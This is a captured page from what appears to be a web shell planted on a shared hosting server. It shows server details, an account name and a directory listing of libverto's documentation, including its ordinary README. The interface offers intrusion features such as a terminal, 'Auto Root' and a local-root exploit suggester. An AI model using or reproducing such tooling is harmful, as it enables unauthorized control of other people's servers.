Linux server1.hosting4iran.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
LiteSpeed
Server IP : 185.208.174.156 & Your IP : 216.73.216.218
Domains : 282 Domain
User : satitravel
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libverto /
Delete
Unzip
Name
Size
Permission
Date
Action
AUTHORS
80
B
-rw-r--r--
2021-03-15 17:56
ChangeLog
46
B
-rw-r--r--
2021-03-15 17:56
NEWS
40
B
-rw-r--r--
2021-03-15 17:56
README
617
B
-rw-r--r--
2015-09-08 21:59
Save
Rename
libverto =============================================================================== libverto exists to solve an important problem: many applications and libraries are unable to write asynchronous code because they are unable to pick an event loop. This is particularly true of libraries who want to be useful to many applications who use loops that do not integrate with one another or which use home-grown loops. libverto provides a loop-neutral async api which allows the library to expose asynchronous interfaces and offload the choice of the main loop to the application.